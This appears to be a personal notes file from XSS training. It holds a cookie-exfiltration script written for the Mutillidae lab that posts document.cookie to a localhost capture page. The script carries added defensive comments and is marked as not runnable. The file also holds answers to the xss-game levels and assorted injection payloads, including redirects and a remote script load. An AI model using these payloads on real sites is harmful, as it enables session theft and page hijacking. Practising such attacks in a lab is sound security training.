Use Mutillidae

<script>
    // Lab demonstration for the Mutillidae training application: once script runs in
    // a page's origin (via XSS), it reads that origin's cookies and POSTs them to
    // Mutillidae's own capture page on lHost (localhost here).
    // Defensive takeaways: mark session cookies HttpOnly, encode output at the
    // injection point, and restrict script execution and outbound requests with a
    // Content-Security-Policy.
    // NOTE(review): this listing is not runnable as printed; read it as an
    // illustration of the technique, not as working code.
    var    lXMLHTTP;
    try {
        // document.cookie exposes only cookies that are NOT flagged HttpOnly, which
        // is why HttpOnly on session cookies limits what a script like this can read.
        var lData = document.cookie;
        var lHost = "localhost";
        var    lAction = "http://" + lHost + "/mutillidae/capture-data.php";
        var lMethod = "POST";
        // Transport selection: two legacy Internet Explorer ActiveX ProgIDs are tried
        // first, then a native request object. Every failure is swallowed by an
        // empty catch, so nothing is shown to the user.
        try {
            lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
        }catch (e) {
            try {
                lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");                
            }catch (e) {
                try {
                    lXMLHTTP = new XMLHTTPRequest();                    
                    }catch (e) {
                        //alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
                        }
                }
            }//end try
            // No-op state handler: the response is never inspected.
            lXMLHTTP.onreadystatechange = function(){}
            lXMLHTTP.open(lMethod, lActionm true);
            // "Host" is a forbidden header name for XMLHttpRequest; standards-compliant
            // browsers do not let page script set it.
            lXMLHTTP.setRequestHeader("Host", lHost);
            lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            // The raw cookie string is sent as the request body.
            lXMLHTTP.send(lData);
    }catch(e){
        // Errors are suppressed here as well, so the page shows no visible sign of
        // failure; detection has to rely on request logs or CSP violation reports
        // rather than on user-visible errors.
        //alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
    }
</script>

https://xss-game.appspot.com/

Level 1

<script>alert(1)</script>

Level 2

<img src="bruh.jpg" onerror="alert('XSS')"/>

Level 3

https://xss-game.appspot.com/level3/frame#2'onerror='alert("xss")'>

;alert('XSS');%20/>

%3Balert('XSS');%20/>

;%20onload="alert('XSS');"%20/>

3%26%27onload="alert('XSS');"%20/>

<blockquote class="imgur-embed-pub" lang="en" data-id="Pah7rtn"><a href="//imgur.com/Pah7rtn">MRW I join the vape nation</a></blockquote>

<script async src="//s.imgur.com/min/embed.js" charset="utf-8"></script>

<IFRAME SRC=javascript:alert('XSS')></IFRAME>

<iframe src=//www.youtube.com/embed/dQw4w9WgXcQ></iframe>

It will add an embedded iframe for the YouTube video Rick Roll. To keep the link from rendering, I had to HTML-encode < to &lt;, and for good measure also change > to &gt; and change the & in &lt; to &amp;.

<img src="http://url.to.file.which/not.exist" onerror=window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ","xss",'height=500,width=500'\);>

<script onload=window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ","xss",'height=500,width=500'\);></script>

<iframe src=//www.youtube.com/embed/dQw4w9WgXcQ></iframe>
<script>window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ");</script>
<!-- Injected-script example. The helper l(u, i) appends a script element with
     src u and id i to the body unless an element with that id already exists;
     it is called here to pull jQuery 1.11.1 from ajax.googleapis.com over plain
     http. The ready handler then prepends a div holding an autoplaying YouTube
     iframe to #genericPage-content.
     NOTE(review): not runnable as printed; it shows what stored markup can do
     once script executes in the page.
     Defensive takeaway: encode output at the injection point, and use a
     Content-Security-Policy that limits script-src and frame-src so remote
     script loads and injected frames are refused. -->
<script>function(){function l(u,i){
var d=document;if(!d.getElementById(i)){var s=d.createElement('script');s.src=u;s.id=i;d.body.appendChild(s);}}l('http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js','jquery')}
$('document').ready(function() {
$('#genericPage-content').prepend('<div style="position:relative;height:0;padding-bottom:56.25%"><iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ?ecver=2&autoplay=1" width="640" height="360" frameborder="0" style="position:absolute;width:100%;height:100%;left:0" allowfullscreen></iframe></div>');
}
</script>
<script>document.location.href = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";</script>
